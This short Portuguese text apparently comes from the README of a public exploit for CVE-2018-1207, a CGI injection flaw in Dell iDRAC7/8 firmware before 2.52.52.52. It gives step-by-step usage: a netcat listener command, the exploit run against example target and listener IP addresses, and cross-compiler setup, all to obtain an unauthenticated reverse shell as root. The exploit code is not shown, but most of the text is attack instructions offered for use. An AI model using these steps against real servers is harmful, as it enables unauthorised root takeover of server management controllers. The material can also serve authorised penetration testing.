
Exploit iDRAC 7 & 8 firmware < 2.52.52.52
Exploit iDRAC 7 & 8 firmware < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, versões anteriores a 2.52.52.52, contêm uma vulnerabilidade de injeção CGI que poderia ser usada para executar código remoto. Um atacante remoto não autenticado pode potencialmente usar variáveis CGI para executar código remoto.
Este código deve fazer com que o serviço iDRAC abra um shell reverso como usuário root.
Inicie seu ouvinte local: nc -v -l -p local_port
nc -v -l -p 5500
Execute o exploit: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
Você precisa ter uma versão do sh4-linux-gnu-gcc instalada, que atualmente é sh4-linux-gnu-gcc-11
Você pode instalá-lo com apt install gcc-11-sh4-linux-gnu